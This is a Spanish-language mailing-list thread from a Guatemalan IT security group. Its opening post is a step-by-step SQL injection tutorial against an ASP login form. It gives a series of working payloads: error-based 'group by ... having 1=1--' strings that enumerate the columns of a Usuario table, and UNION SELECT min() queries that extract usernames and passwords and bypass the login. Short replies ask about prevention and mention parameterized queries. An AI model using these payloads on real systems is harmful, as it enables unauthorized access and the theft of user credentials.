Sql Injection - Login ASP

[César Calderón AkA Stuxnet]

Buenas; les comparto un tutorial que hace tiempos cree cuando estuve investigando un poco sobre sql. Saludos espero sea de su agrado.

Como sabrán la vulnerabilidad sqli es la mas explotada, este ataque consiste en insertar código malicioso en las cadenas que posteriormente se pasan a una instancia de SQL Server para su análisis y ejecución

En el en campo "Clave de Acceso" y "Password" del login escribimos:

' having 1= 1--

Al hacerlo nos dara el seguiente error:

Sabemos que es vulnerable y nos acaba de dar el nombre de la tabla y la columna "Usuario.Clave, teniendo esto regresamos a nuestro login y escribimos:

' group by Usuario.Clave having 1 = 1--

Hacemos la inyección y el siguiente error sera así:

Nos acaba de dar el nombre de la tabla y la columna "Usuario.Nombre", teniendo esto regresamos a nuestro login y escribimos:

' group by Usuario.Clave, Usuario.Nombre having 1=1--

Hacemos la inyección y el siguiente error sera así:

Nos acaba de dar el nombre de la tabla y la columna "Usuario.Clave_de_Acceso", teniendo esto regresamos a nuestro login y escribimos:

' group by Usuario.Clave, Usuario.Nombre, Usuario.Clave_de_Acceso having 1=1--

Hacemos la inyección y el siguiente error sera así:

Nos acaba de dar el nombre de la tabla y la columna "Usuario.Password", teniendo esto regresamos a nuestro login y escribimos:

' group by Usuario.Clave, Usuario.Nombre, Usuario.Clave_de_Acceso, Usuario.Password having 1=1--

Hacemos la inyección y el siguiente error sera así:

Nos acaba de dar el nombre de la tabla y la columna "Usuario.Tipo_de_Usuario", teniendo esto regresamos a nuestro login y escribimos:

' group by Usuario.Clave, Usuario.Nombre, Usuario.Clave_de_Acceso, Usuario.Password, Usuario.Tipo_de_Usuario having 1=1--

Hacemos la inyección y el siguiente error sera así:



Nos acaba de dar el nombre de la tabla y la columna "Usuario.Tunto_de_Captura", teniendo esto regresamos a nuestro login y escribimos:

' group by Usuario.Clave, Usuario.Nombre, Usuario.Clave_de_Acceso, Usuario.Password, Usuario.Tipo_de_Usuario, Usuario.Punto_de_Captura having 1=1--

Hacemos la inyección y el siguiente error sera así:

Nos acaba de dar el nombre de la tabla y la columna "Usuario.ESTATUS", teniendo esto regresamos a nuestro login y escribimos:

' group by Usuario.Clave, Usuario.Nombre, Usuario.Clave_de_Acceso, Usuario.Password, Usuario.Tipo_de_Usuario, Usuario.Punto_de_Captura, Usuario.ESTATUS having 1=1--

Como podemos observar al hacer esto nos dira "clave de acceso y/o password incorrectos" esto quiere decir que hemos terminado de buscar las tablas y columnas.

Nuestra siguiente inyección sera de esta forma:

' union select 1,1,1,1,1,1,min(Clave_de_Acceso) from Usuario where Clave_de_Acceso > 'a'--

Esta parte tenemos 6 unos y min(LOGIN) es la posición al hacer la inyección les arroja los datos.

La posión de los unos puede varia un ejemplo podría ser:

' union select 1,1,1,1,min(Clave_de_Acceso)1,1 from Usuario where Clave_de_Acceso > 'a'--

Curiosamente al hacer la inyección de esta forma tenemos el acceso:

' union select 1,1,1,1,1,1,min(Password) from Usuario where Clave_de_Acceso > 'ADMIN'--

La inyección para que les arroje la password es:

' union select 1,1,1,1,1,1,min(Password) from Usuario where Password > 'ADMIN'--

[Amilcar de Leon]

bienvenido a la lista stuxnet, está interesante tu tutorial, qué recomendas para prevenir éste tipo de ataques? específicamente para una aplicación como la que estuviste testeando (asp)

--
Has recibido este mensaje porque estás suscrito al grupo "Seguridad de TI Guatemala" de Grupos de Google.
Para anular la suscripción a este grupo y dejar de recibir sus mensajes, envía un correo electrónico a seguridadTIGuate...@googlegroups.com.
Para publicar en este grupo, envía un correo electrónico a seguridadT...@googlegroups.com.
Para ver esta conversación en el sitio web, visita https://groups.google.com/d/msgid/seguridadTIGuatemala/86374093-11b9-47b4-a204-4baadacd44ab%40googlegroups.com.
Para acceder a más opciones, visita https://groups.google.com/d/optout.

--

Amilcar de León

"The 5 S's of BBQ: Sauce, Spice, Smoke, Sizzle, and SQLi"

[César Calderón AkA Stuxnet]

Buenas noches; Me alegro que te haya gustado, se podría rechazar las peticiones con caractéres sospechosos y parametrizar las sentencias sql.

Para anular la suscripción a este grupo y dejar de recibir sus mensajes, envía un correo electrónico a seguridadTIGuatemala+unsub...@googlegroups.com.

Para publicar en este grupo, envía un correo electrónico a seguridadT...@googlegroups.com.
Para ver esta conversación en el sitio web, visita https://groups.google.com/d/msgid/seguridadTIGuatemala/86374093-11b9-47b4-a204-4baadacd44ab%40googlegroups.com.
Para acceder a más opciones, visita https://groups.google.com/d/optout.

[Felix Palacios]

gracias por compartir... saludos.

Para anular la suscripción a este grupo y dejar de recibir sus mensajes, envía un correo electrónico a seguridadTIGuate...@googlegroups.com.

Para publicar en este grupo, envía un correo electrónico a seguridadT...@googlegroups.com.

Para ver esta conversación en el sitio web, visita https://groups.google.com/d/msgid/seguridadTIGuatemala/37adb987-b1e7-4d72-b131-270304f89498%40googlegroups.com.

[Cesar Garcia]

Saludos a todos!

Para ver esta conversación en el sitio web, visita https://groups.google.com/d/msgid/seguridadTIGuatemala/CAEe4Wk0oc%2BEiVjiUWeRfUW7kFEPPEPjhNyeobxncagN54qvSGQ%40mail.gmail.com.

Para acceder a más opciones, visita https://groups.google.com/d/optout.

--

Cesar García
01000011 01001000 00110011
Guatemala, Guatemala C.A
"Convencido de que la mitad de lo que separa a los emprendedores exitosos de los que no triunfan es la perseverancia"